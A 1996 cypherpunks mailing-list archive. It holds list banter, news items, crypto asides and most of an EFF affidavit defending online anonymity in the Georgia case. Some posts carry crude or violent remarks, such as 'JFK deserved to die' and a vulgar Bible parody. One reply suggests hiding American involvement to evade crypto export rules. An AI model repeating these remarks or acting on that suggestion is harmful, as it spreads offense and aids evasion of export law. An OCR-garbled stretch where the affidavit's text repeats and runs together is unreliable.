methodology was changed in response to Japanese students doing better than
American students.


>ok
>buh bye
>
>Erp

On second thought....

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 26 Sep 1996 07:33:29 +0800
To: cypherpunks@toad.com
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <Pine.SOL.3.93.960925094517.13583F-100000@stiletto.acadian.net>
Message-ID: <u0NTuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering <pgf@acadian.net> writes:
> It's widely believed that the New Orleans Mafia (the source of my recent
> statement about body decomposition in Louisiana swamps) was a prime driver
> in the assasination of the late President John F. Kennedy.
> 
> I think it's fairly safe to say that having done this didn't do them a
> damn bit of good. It didn't do anyone else a damn bit of good.

JFK deserved to die.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 14:09:02 +0800
To: cypherpunks@toad.com
Subject: Re: Lexis and Privacy - Bill approaches.
Message-ID: <ae6f4de1040210048b6d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Stop sending me messages like this. This is getting annoying.

--TCM


At 10:13 PM 9/25/96, PhneCards@aol.com wrote:
>Did you know this company is using your email address as part of
>an unlawful email bomb?
>
>I would advise you to write to them at cypherpunks@toad.com
>and owner-cypherpunks@toad.com and advise them to stop
>using your email address for this type of activity.
>
>It is illegal to use a invalid return email address.  If this continues, I
>will
>be forced to prosecute the return email address - which they are
>making to look like you.
>
>Below is the letter that I received in my email box
>=================================================
>
>In a message dated 96-09-25 15:12:13 EDT, you write:
>
>>Subj:  Re: Lexis and Privacy - Bill approaches.
>>Date:  96-09-25 15:12:13 EDT
>>From:  declan@eff.org (Declan McCullagh)
>>Sender:        owner-cypherpunks@toad.com
>>To:    unicorn@schloss.li (Black Unicorn)
>>CC:    cypherpunks@toad.com
>>
>>This would be good if the bills were written well and thoughtfully.
>>Unfortunately, they explicitly extend executive branch regulatory
>>jurisdiction to the Net. At least the one I read did; I understand there
>>are multiple versions.
>>
>>-Declan
>>
>>
>>On Tue, 24 Sep 1996, Black Unicorn wrote:
>>
>>>
>>> Pressure from the FTC Which fielded hundreds of complaints about Lexis and
>>> the social security number scrap) has prompted members of the Banking
>>> Committee to add provisions to the most recent spending bills which
>>> protect personal information (including social security numbers, phone
>>> numbers, addresses, and so forth) under the Fair Credit Reporting Act.
>>> This limits access to this information to credit agencies and otherwise
>>> authorized entities.  (Of which I assume Lexis is not one).
>>>
>>> It's not great protection, but it's something.
>>>
>>> I urge everyone to take their own measures to protect personal data
>>> regardless of what some piece of paper on a library shelf says is
>>> protected.  The only real protection is not to allow release of the data
>>> in the first place.
>>>
>>> --
>>> I hate lightning - finger for public key - Vote Monarchist
>>> unicorn@schloss.li
>>>
>>
>>
>>// declan@eff.org // I do not represent the EFF // declan@well.com //
>>
>>
>>
>>
>>----------------------- Headers --------------------------------
>>From cypherpunks-errors@toad.com  Wed Sep 25 15:11:39 1996
>>Return-Path: cypherpunks-errors@toad.com
>>Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by
>>emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA10310 for
>><phnecards@aol.com>; Wed, 25 Sep 1996 15:11:34 -0400
>>Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4)
>>       id AA27335; Wed, 25 Sep 1996 13:11:11 -0600
>>Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id FAA15636
>for
>>cypherpunks-outgoing; Wed, 25 Sep 1996 05:06:43 -0700 (PDT)
>>Received: from eff.org (declan@eff.org [204.253.162.3]) by toad.com
>>(8.7.5/8.7.3) with ESMTP id FAA15631 for <cypherpunks@toad.com>; Wed, 25 Sep
>>1996 05:06:39 -0700 (PDT)
>>Received: (from declan@localhost) by eff.org (8.7.5/8.6.6) id FAA10228; Wed,
>>25 Sep 1996 05:06:38 -0700 (PDT)
>>Date: Wed, 25 Sep 1996 05:06:38 -0700 (PDT)
>>From: Declan McCullagh <declan@eff.org>
>>To: Black Unicorn <unicorn@schloss.li>
>>Cc: cypherpunks@toad.com
>>Subject: Re: Lexis and Privacy - Bill approaches.
>>In-Reply-To: <Pine.SUN.3.94.960924190706.9902A-100000@polaris>
>>Message-Id: <Pine.SUN.3.91.960925050416.10072A-100000@eff.org>
>>Mime-Version: 1.0
>>Content-Type: TEXT/PLAIN; charset=US-ASCII
>>Sender: owner-cypherpunks@toad.com
>>Precedence: bulk


--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 26 Sep 1996 09:28:36 +0800
To: adamsc@io-online.com
Subject: Re: Uses of Computational Chaos
Message-ID: <01I9WC3IZ5VO8Y53G5@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"adamsc@io-online.com"  "Chris Adams" 17-SEP-1996 15:12:13.73

>Supposing, too, that you know these weaknesses, would using separate algorithms
>for different portions of the number work well?

	That would seem to be a possibility; admittedly, the local copy of
AC has been checked out for the past year, so I haven't been able to take a
look at it. I'd tend to think that if you _know_ the flaw, one could come up
with a better way to deal with it than the generalized method I discussed.
For instance, if the MSB of bytes coming out of a scribble window is too low
in entropy, only use it XORed or whatever with a more-random bit.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 26 Sep 1996 07:20:51 +0800
To: cypherpunks@toad.com
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <9609251433.AB02026@cti02.citenet.net>
Message-ID: <sNoTuD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Jean-Francois Avon" <jf_avon@citenet.net> writes:
> Please reply by e-mail since I am not on Cypherpunks anymore.

Good riddance. That's the kind of subscribers this list needs to lose,
rather than the technical people.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 26 Sep 1996 10:34:19 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 19 Sept 1996
Message-ID: <01I9WCSFW5FY8Y53G5@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@educom.unc.edu" 20-SEP-1996 01:52:41.56

>*****************************************************************
>Edupage, 19 September 1996.  Edupage, a summary of news about information
>technology, is provided three times a week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>*****************************************************************

>LUCENT'S NET SOFTWARE MAKES INTERNET PHONE CALLS EASY
>New software developed by Lucent Technologies is designed to give Internet
>callers quicker access to one another and allows them to converse via their
>computers as if they were on a regular speaker-phone.  Previous software has
>been half-duplex -- one party must stop speaking before the other can
>"capture" the line.  Lucent plans to market the software to AT&T, the Bell
>companies and Internet service providers for distribution to their
>customers.  By the end of the year, Lucent plans to enhance the software so
>that users can videoconference over the Internet.  (Wall Street Journal 18
>Sep 96 B8)

I'd wonder if a patch can be built to encrypt each packet as it goes out? I'm
guessing that what they've done is improve the voice compression, so there will
be a relatively small amount of data to encrypt.

>PROGRAMMABLE COMPUTER CHIPS
>Next month, Metalithic Systems Inc. will release a $1500 sound board called
>Digital Wings that uses field-programmable gate array computer chips that
>can be personalized, allowing the user to create and edit up to 128
>soundtracks.  When used in combination with Windows 95, Digital Wings will
>give users access to audio synthesis and editing tools comparable to those
>of a professional sound studio.  (Business Week 23 Sep 96 p86)

	I wonder exactly how reprogrammable this system is...

>Edupage is written by John Gehl <gehl@educom.edu> & Suzanne Douglas
><douglas@educom.edu>.  Voice:  404-371-1853, Fax: 404-371-8057.

>Technical support is provided by Information Technology Services at the
>University of North Carolina at Chapel Hill.

>***************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>Alfred Adler (if your name is Alfred Adler;  otherwise, substitute your own
>name).  ...  To cancel, send a message to: listproc@educom.unc.edu with the
>message: unsubscribe edupage.   (If you have subscription problems, send
>mail to manager@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 26 Sep 1996 02:37:08 +0800
To: cypherpunks@toad.com
Subject: PEA_nut
Message-ID: <199609251417.OAA27148@pipe3.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


9-25-96. WaJo reports on yesterday's suit challenging Georgia's crackerdown
on the Internet, including its prohibition of anonymity. Ms. Dyson avidly
supports anon, it lies. 
 
 
--------- 
 
 
http://jya.com/peanut.txt 
 
 
PEA_nut 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 26 Sep 1996 08:45:50 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Where to write crypto?
Message-ID: <v02130502ae6ef79519af@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>On Tue, 24 Sep 1996, Steve Schear wrote:
>
>> I believe Taiwan might be an excellent location to have 'clear room' crypto
>> work done.  Taiwan has a very large skilled software labor pool and isn't a
>> member of COCOM.
>Why go so far, when you can export crypto from Anguila or Canada. The
>first is right next to Florida and is a tax haven, the second has a large
>talent pool and the same qulity telecom as the States. The main problem is
>concealing the fact that there may be any Americans involved. Both save
>you the trouble of learning Chinese.

I didn't mean that an U.S. citizen should relocate and develop in Taiwan.
Why do that when almost all Taiwanese CS speak, read and write fluent
english.  Just develop the specs and contract for programming.  There are
many companies waiting to take you business .

BTW, there a several U.S. companies (e.g., Typhoon Software,
typhoon@typhoon.com) which can manage the development of a wide variety of
software projects (including crypto code) by highly qualified personel in
the former Soviet Republics.  For comfort, the software can be tested in
the U.S. (just to make sure no trapdoors have been insered by the Russian
Mafia ;-)

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Thu, 26 Sep 1996 08:50:29 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: EFF declaration/affidavit in support of anonymity in GA case.
Message-ID: <199609252203.PAA27878@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Full text (with some scannos, but it's readable) in next message. Enough 
about "lies".  We're not just talkin' the talk, we're walkin' the walk too.

Also, we are negotiating final details on assisting Julf with a legal 
defense fund for anon.penet.fi's troubles.

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Thu, 26 Sep 1996 10:08:29 +0800
To: cypherpunks@toad.com
Subject: affeff.htm
Message-ID: <199609252203.PAA27883@eff.org>
MIME-Version: 1.0
Content-Type: text/plain



                                 EFF AFFIDAVIT
                                       
   IN THE UNITED STATES DISTRICT COURT
   
   FOR THE NORTHERN DISTRICT OF GEORGIA
   
   ATLANTA DIVISION
   
   
   
   AMERICAN CIVIL LIBERTIES )
   
   UNION OF GEORGIA, et al, )
   
   )
   
   Plaintiffs, ) CIVIL ACTION
   
   )
   
   vs. )
   
   ) FILE NO. _______
   
   ZELL MILLER, in his official )
   
   capacity as Governor of the )
   
   State of Georgia, et al, )
   
   )
   
   Defendants. )
   
   
   
   DECLARATION OF SHARI STEELE
   
   County of Charles )
   
   State of Maryland )
   
   
   
   1. My name is Shari Steele. I am employed as staff counsel for the
   Electronic Frontier Foundation (EFF), a nationwide, nonpartisan
   nonprofit civil liberties organization of approximately 3500
   individual members. EFF works in the public interest to protect
   privacy, free expression, and access to public resources and
   information online, as well as to promote responsibility in new media.
   EFF is committed to defending civil liberties in the world of computer
   communications, to developing a sound legal framework for that world,
   and to educating government, journalists, and the general public about
   the legal and social issues raised by this new medium. The facts set
   forth in this declaration are based upon my personal knowledge and
   upon the business records of EFF. I submit this affidavit on behalf of
   EFF.
   
   
   
   2. EFF is a nonprofit organization incorporated under the laws of
   California, with our principal place of business in California. EFF
   has members throughout the United States, including Georgia.
   
   
   
   3. Since our inception in 1990, EFF has devoted considerable resources
   to educating the public about civil liberties and other legal issues
   as they arise in the context of online computer communications, or
   "cyberspace." Throughout EFF's existence, we have initiated and/or
   moderated several online forums, including forums on the World Wide
   Web, the WELL (a California-based conferencing system and Internet
   Service Provider), and USENET discussion groups. These forums are
   primarily interactive discussion groups, but EFF representatives also
   frequently participate in online "chat" rooms and in special online
   events that allow users to discuss and debate a variety of legal and
   constitutional issues.
   
   
   
   4. In addition, EFF has our own computer site on the Internet, and our
   name (sometimes referred to as a "domain" name) is "eff.org." EFF's
   public education efforts include the maintaining of extensive online
   resources, both on the forums we run with online service providers and
   on our own Internet site. These resources include articles, court
   cases, legal papers, news releases, newsletters, and excerpts from
   public discussions related to EFF's legal, legislative, educational
   and advocacy work. EFF also publishes web pages on the World Wide Web,
   which can be accessed at http://www.eff.org/.
   
   
   
   5. EFF maintains eight online mailing lists, both for specific
   civil-liberties and activist activities, and for informing the public
   about our activities. Our primary mailing list has a subscriber base
   of approximately 7500 individuals, including many located in the State
   of Georgia.
   
   
   
   6. On average, EFF's web page is accessed by Internet users more than
   300,000 times every day. Through our web site, EFF transmits between
   1.2 to 1.5 gigabytes of information per day. Roughly speaking, this
   means that EFF's web site transmits the equivalent of 250 to 350
   million words, or two entire encyclopedias' worth of information, over
   computer networks every day. A substantial volume of this information
   is transmitted into the State of Georgia or through wires located in
   that State.
   
   
   
   7. Although EFF's web site and many of our online resources are based
   on a computer in California, those resources are accessible to EFF
   members and other interested individuals throughout the world and in
   every state of the United States, including the State of Georgia.
   Similarly, the EFF resources and forums that are maintained on other
   national commercial online forums can by accessed by those systems'
   subscribers throughout the United States, including the State of
   Georgia.
   
   
   
   8. EFF routinely advises individuals and groups about their legal
   rights and responsibilities in the online world. In addition, EFF
   advocates positions, and promotes discussions, about what those rights
   and responsibilities should be. Since virtually all interactions on
   the Internet and other computer networks are at their essence
   communication and expression, EFF's policy positions and the
   discussions we foster strongly emphasize freedom-of-speech concerns.
   Similarly, because free flow of information made possible by this new
   online technology creates the possibility of extraordinary intrusion
   into the privacy of computer users, EFF's policy positions and the
   discussions we foster strongly emphasize the issues of protection of
   online privacy, including the right to communicate anonymously over
   computer networks and the right to use encryption software to prevent
   unauthorized interception and viewing of private communications sent
   over computer networks.
   
   
   
   9. As a part of EFF's efforts to protect the privacy of on line users
   and in furtherance of free speech, EFF routinely assists our members
   and members of the general public in protecting their privacy when
   communicating over the Internet, while at the same time emphasizing
   the importance of using these privacy rights responsibly. EFF
   facilitates responsible anonymous communication over computer networks
   in several ways. For example, many participants in online discussions
   and chats sponsored by EFF use "handles," i.e., assumed names, rather
   than their actual names. EFF also provides links on our web page to
   so-called "anonymous remailers," which are computers on the Internet
   that will forward Internet e-mail anonymously, allowing an even
   greater level of privacy for online communications than can be
   obtained by the use of pseudonyms alone. EFF is aware of and
   facilitates the responsible use of online handles or pseudonyms, and
   of communications via anonymous remailers, because the ability to
   communicate over online networks in this way allows users to
   participate in chats or discussions groups without abandoning their
   privacy. It permits users to participate in these discussions without
   revealing their name to strangers, and without fear of retaliation for
   the expression of unpopular or controversial viewpoints. This
   protection of privacy furthers the public interest by facilitating
   freer and more frank discussions, especially on controversial issues
   such as questions of online privacy and encryption software.
   
   
   
   10. Similarly, EFF wants to make the information that we pub lish on
   such issues freely available to computer network users who seek it but
   who want to obtain it anonymously, i.e., by requesting it over
   computer networks using a pseudonym or handle. Again, EFF believes
   that by protecting the privacy of users by allowing them to obtain
   information of public interest anonymously, information on these
   issues can be disseminated more fully and freely over computer
   networks.
   
   
   
   11. In addition, nearly all of EFF's approximately 3500 mem bers use
   online communications. EFF members both receive and transmit
   information through a variety of online communications, including the
   World Wide Web, online mailing lists, discussion groups, chat rooms,
   computer bulletin boards, and private e-mail. Many of EFF's members
   use handles or pseudonyms to protect their privacy when communicating
   over computer networks. Many of these communications pass through the
   State of Georgia.
   
   
   
   12. I have reviewed the language of O.C.G.A. 16-9-93.1, and neither I
   nor EFF can determine from its language whether commu nication over
   computer networks using a pseudonym or assumed name constitutes the
   use of a name that "falsely identifies" the user for the purposes of
   the criminal sanctions imposed by this statute. Because EFF actively
   facilitates and encourages the responsible use of pseudonyms in online
   communications for the protection of privacy, however, and because
   virtually all of the anonymous communications over computer networks
   facilitated by EFF are as easily accessible in Georgia as anywhere
   else in the world, EFF is fearful that our activities could be viewed
   by a Georgia prosecutor as aiding and abetting violations of the
   statute. Similarly, EFF is concerned on behalf of our members that
   those members who communicate over computer networks using pseudonyms
   or handles could be violating this criminal statute. EFF, both on our
   own behalf and on behalf of our members, therefore fears prosecution
   or other enforcement in Georgia under the statute, and seeks guidance
   from the Court as to the effect and scope of this vague law. Although
   EFF is concerned about the risk of prosecution, EFF views any such
   restriction on our activities in furtherance of the public interest as
   patently unconstitutional, and we fully intend to continue our
   activities in support of online privacy and free speech despite the
   passage of this law.
   
   
   
   13. In addition to the many other services that EFF provides to our
   members and to the online community in general is the online
   publication through EFF's web site of an extensive archive of articles
   and other information of interest to the online community. EFF's
   archives include information on government and legislative activities,
   legal issues and cases, academic freedom, censorship, free expression
   and other civil liberties, the infor mation infrastructure and network
   resources, intellectual property, privacy and encryption, net culture
   and the online community, and social responsibility in the use of
   online resources. Included within these archives are hundreds of
   hyperlinks from the EFF web site to other information and resources
   made available by others on the Internet on related topics. Many of
   these links use the trade names of the companies, organizations,
   government agencies or other entities to whom the link is provided. In
   some cases, EFF uses the logos or other graphical symbols of the
   organizations to whom we are linking on our web site. EFF does not
   obtain prior permission from other web publishers before providing
   links to their web sites in this manner. Given the sheer number of
   links, EFF could not as a practical matter do so. EFF does not intend
   to falsely imply that we have obtained such permission or that we are
   formally affiliated with any of these other entities. EFF is aware
   that individuals and companies that maintain their own web sites want
   others to link to their sites as a matter of course. EFF is concerned
   that its use of these trade names and images could violate the Act and
   subject EFF or our members to criminal prosecution, when it is the
   Act, not our actions, that is in defiance of the customary usage and
   spirit of the Internet.
   
   
   
   COMPUTER NETWORKS AFFECTED BY THE RESTRICTIONS OF O.C.G.A. 16- 9-93.1
   
   
   
   The Global Internet
   
   
   
   14. The largest computer network in the world is the Internet. It
   links a large number of smaller networks set up by universities,
   industry, nonprofit organizations, governments, and individuals. While
   estimates can only be approximations due to rapid growth, the Internet
   is believed to connect at least 59,000 computer networks, 2.2 million
   computers, 159 countries, and 40 million users. By some estimates,
   there will be as many as 200 million Internet users by the year 1999.
   
   
   
   15. No one owns the Internet. It is a decentralized global medium of
   communication and expression in which governments, universities,
   institutions, corporations, and millions of ordinary people can
   communicate with each other, express opinions, share ideas, educate
   themselves, and seek, exchange or publish information on every
   imaginable topic either to specific recipients or to the entire world
   almost instantaneously and at minimal cost.
   
   
   
   16. Virtually anyone can now use the Internet to communicate with
   other online users. Anyone with a personal computer, modem, and
   telephone line can obtain access to the Internet through an Internet
   Service Provider ("ISP"), usually for a fee. Many businesses,
   universities, and other institutions have computer networks that are
   directly connected to the Internet and give their employees, faculty,
   students, etc., free or low-cost Internet access accounts. For those
   without a computer or access through work or school, many communities
   have establrnet to communicate with other online users. Anyone with a
   personal computer, modem, and telephone line can obtain access to the
   Internet through an Internet Service Provider ("ISP"), usually for a
   fee. Many businesses, universities, and other institutions have
   computer net works that are directly connected to the Internet and
   give their employees, faculty, students, etc., free or low-cost
   Internet access accounts. For those without a computer or access
   through work or school, many communities have establternet can travel
   any number of different paths to get from its origin to its
   destination. Persons transmitting information over this international
   computer network have no control over the route their messages take.
   Any data transmitted over the Internet could potentially travel
   through the wires or airspace of Georgia.
   
   
   
   18. There are hundreds of thousands of Internet users in the State of
   Georgia, all of whom can communicate with or receive information from
   any other user on the network anywhere in the world.
   
   
   
   Commercial Online Services
   
   
   
   19. In addition to the global Internet, communications over the large
   national computer networks known as "commercial online services,"
   including Prodigy, America Online and CompuServe, are also affected by
   the Act.
   
   
   
   20. These services enable their customers to communicate with other
   customers, access the Internet, and access other proprietary
   information and services available only to subscribers. There are more
   than 12 million subscribers to major commercial online services in the
   United States and overseas; each of these services have customers in
   Georgia, who use the service to communicate with others throughout the
   United States (and in some cases, the world).
   
   
   
   Local Bulletin Board Services ("BBSs")
   
   
   
   21. The Act also affects communications over thousands of local
   dial-in computer services known as Bulletin Board Systems, or "BBSs."
   With a relatively small investment, anyone with a phone line,
   computer, modem, and proper software can establish a BBS to allow
   friends, neighbors, customers, or members of the general public to
   dial in and communicate with each other on topics of common interest.
   There are several hundred such BBSs in Georgia, operated by
   individuals, nonprofit organizations, advocacy groups, and businesses.
   In addition, there are thousands of additional local BBSs in other
   states, which can be reached from Georgia over long distance telephone
   lines or through a network of BBS systems, which allows BBS
   subscribers to communicate with subscribers to other BBSs in Georgia
   and throughout the country.
   
   
   
   THE NATURE OF COMMUNICATION OVER COMPUTER NETWORKS AFFECTED BY THE ACT
   
   
   
   22. Computer users communicate with each other over the com puter
   networks described above in many different ways. The content of all of
   the following types of communications are restricted by the broad
   language of the Act.
   
   
   
   E-Mail
   
   
   
   23. E-mail is the basic method of communication over computer
   networks. It allows one user to send a message to any other user or
   users on the network.
   
   
   
   24. Because mass mailings via e-mail are relatively easy and
   inexpensive, e-mail enables any user to publish and distribute
   information on any topic simply by compiling a mailing list of online
   users and sending the newsletter to everyone.
   
   
   
   Discussion & Chat Groups
   
   
   
   25. One of the most popular forms of communication over com puter
   networks are "discussion groups." Discussion groups allow users of
   computer networks to post messages onto a public computerized bulletin
   board or to an automated electronic mailing list of subscribers, and
   to read and respond to messages posted by others participating in the
   discussion group. Discussion groups have been organized on many
   different computer networks and on virtually every topic imaginable.
   
   
   
   26. On the Internet, the bulletin board discussion groups are known as
   the "USENET" newsgroups and are arranged by subject mat ter. There are
   currently USENET newsgroups on more than 15,000 different subjects,
   and over 100,000 new messages are posted to these groups each day. In
   addition, there are many thousands more Internet discussion groups
   organized through automated mail ing lists to subscribers. There are
   still thousands more organized on the various commercial online
   services and on local BBSs. All or virtually all of these discussion
   groups are accessible by computer users in Georgia.
   
   
   
   27. Similar to discussion groups are "chat groups," which allow users
   to engage in real time conversations with each other by typing
   messages and reading the messages typed by others participating in the
   "chat." Chat groups also occur over the Internet, commercial online
   services, and local BBSs. These groups are often set up by particular
   organizations or online services, but any individual user can form an
   online "chat." Some chat groups are organized for social
   entertainment, and others are organized by a particular sponsor on
   particular topics to provide a specific forum for discussion of issues
   or ideas.
   
   
   
   28. Online discussion and chat groups create an entirely new public
   forum -- analogous to the village green -- in which individuals can
   associate and communicate with others who have common interests and
   can engage in discussion or debate on every imaginable topic.
   
   
   
   Publication and Access to Information: The World Wide Web
   
   
   
   29. A third major category of communication on computer net works
   involves the publication and retrieval of information. Computer
   networks, and especially the Internet, give individuals of ordinary
   means a remarkable new power to publish ideas, opinions, poetry,
   stories, images, video, and sound to the world. This information can
   then be retrieved by anyone in the world who has access to the
   network.
   
   
   
   30. The World Wide Web is the most popular way to publish and retrieve
   information on the Internet. Anyone with access to the Internet and
   proper software can publish "web pages," which may contain text,
   images, sound and even video. The web is comprised of millions of
   separate "web sites" that provide content provided by a particular
   person or organization, and each web site may include one or more
   different web pages published by the author of the site. Any Internet
   user anywhere in the world can view the web pages published by others,
   read their text, look at their images and video, and listen to their
   sounds.
   
   
   
   31. The web was created to serve as the platform for a global, online
   store of knowledge, containing information from a diversity of
   sources, and accessible to Internet users around the world. Though
   information on the web is contained in individual computers, the fact
   that each of these computers is connected to the Internet through web
   protocols allows all of the information to become part of a single
   body of knowledge. It is currently the most advanced information
   system on the Internet.
   
   
   
   The Importance of Links on the World Wide Web:
   
   
   
   32. The web also provides web authors with the unique ability to
   "link" different web pages on the Internet together. These "links" can
   be text or images in a web page that, when selected by the reader,
   automatically transfer the reader to a different location on the
   Internet. For example, a particular link might transport the reader to
   a different part of the same web page or to an entirely different web
   page stored in an entirely different computer anywhere in the world.
   
   
   
   33. The author of any web page can create a "link" that points to any
   other web page published on the Internet, without having to contact
   the creator of the document. In fact, Internet custom and usage does
   not require a web author to contact a document creator, and those who
   create documents expect and hope to have their pages linked to. Many
   of the plaintiffs publish such links in their web pages.
   
   
   
   34. Many pages on the web are published by corporations or
   organizations that operate under trade names. Links to those web pages
   are routinely identified by the trade name of the organization or some
   other logo or trademark that readily identifies the company or
   organization to whose web page the link is directed.
   
   
   
   35. "Search engines" and "directories" on the web are ser vices that
   collect and organize millions of different links to web pages. "Search
   engines," such as Yahoo, Alta Vista, and Webcrawler, allow users to
   search the entire World Wide Web for particular words or phrases. The
   search engine then provides a list of web pages that contain the
   search term and allows the user to "link" to the web page of their
   choice. "Directories" are large databases of web sites arranged
   according to subject matter, similar to an online card catalog.
   Directories provide "links" to relevant web sites on particular
   subjects.
   
   
   
   36. Without these search engines and directories, it would much more
   difficult for Internet users to locate and retrieve information of
   interest on the web. Thus, these search engines and directories
   provide an essential service to all Internet users. They routinely
   provide many "links" to web pages using the trade names or logos of
   the companies or organizations to whom they are linking.
   
   
   
   37. This critical linking feature is the defining character istic of
   the web. The web is comprised of all web pages in the world, stored in
   millions of different computers around the globe. The web is the
   interlocking system of links created by individual users in each
   individual page. Linking is encouraged on the web, because it ties
   different web pages on related topics together into a coherent system,
   even though the individual web pages themselves might be stored in
   different computers in different parts of the world.
   
   
   
   38. "Cyberspace" refers to the combination of all of the online
   communications systems described above.
   
   
   
   WHY PEOPLE COMMUNICATE ANONYMOUSLY IN CYBERSPACE
   
   
   
   39. For many of the same reasons that people have histori cally
   communicated anonymously through other media like print and the
   telephone, online users frequently communicate anonymously or
   pseudonymously in cyberspace.
   
   
   
   40. Anonymity allows online users to voice unpopular ideas without
   fear of retaliation. Citizens can engage in political speech without
   identifying themselves to the party in power. Victims of crime or
   disease can request help and advice without stigma.
   
   
   
   41. Anonymity also eliminates the potential for discrimina tion and
   harassment according to factors like gender and ethnicity. Many women
   communicate online under gender-neutral pseudonyms to avoid harassing
   e-mail. This practice is similar to women who list their telephone
   numbers under their first initials in order to avoid harassing calls.
   Similarly, online users may wish to use a pseudonym in order to avoid
   discrimination or harassment based on names associated with particular
   ethnic groups.
   
   
   
   42. Anonymity also helps online users maintain their privacy. People
   communicating about unpopular or sensitive issues might suffer
   unwanted invasions of privacy, both online and offline, if others had
   access to their real identity. Anonymity also allows famous people to
   communicate online as "average people," without fear of a privacy
   invasion.
   
   
   
   43. In some cases, anonymity is a necessary security measure. The
   personal safety of human rights dissidents, domestic abuse victims,
   and whistle-blowers would be compromised if they could not communicate
   anonymously.
   
   
   
   44. Anonymity also assists users in preventing the collection and
   potential misuse by third parties of personal information about them.
   Online communications can be easily tracked, downloaded and stored by
   anyone; anonymity can prevent unauthorized third parties from tying
   that information to a particular person.
   
   
   
   45. In addition to the advantages of speaking anonymously in
   cyberspace, online users have many reasons for wanting to access
   online information anonymously. Many users would be inhibited from
   accessing controversial, embarrassing, or sensitive information if
   they first had to reveal their identity. Political information, safe
   sex information, and information on stigmatizing diseases are just a
   few examples of content that some users might wish to access
   anonymously. In addition, because most web sites collect information
   about visitors, many online users fear that using their real
   identities would threaten their privacy whenever they access the web.
   
   
   
   HOW INDIVIDUALS COMMUNICATE ANONYMOUSLY IN CYBERSPACE
   
   
   
   46. As a general rule, communications over computer networks typically
   include identifying information, such as the sender's return address
   and message routing information. This default identification of the
   speaker differentiates online communication from communication by
   print and telephone.
   
   
   
   47. Online technology, however, provides users with a variety of ways
   to communicate over computer networks without revealing their
   identity.
   
   
   
   Online Communications Using Pseudonyms or "Screen Names"
   
   
   
   48. Many Internet Service Providers, commercial online ser vices, and
   local BBSs allow users to set up pseudonymous accounts, permitting the
   user to communicate online using a "screen name," "user name," or
   "handle" that is a pen name rather than the real name of the account
   holder. When a user sends mail, publishes newsletters, or participates
   in discussions or chat groups using this screen name, the message sent
   is identified as coming from the screen name adopted by the sender.
   
   
   
   49. Many service providers allow their users to set up multi ple
   "screen names" or "user names." This feature allows users to use
   different names for different purposes. For example, a user might use
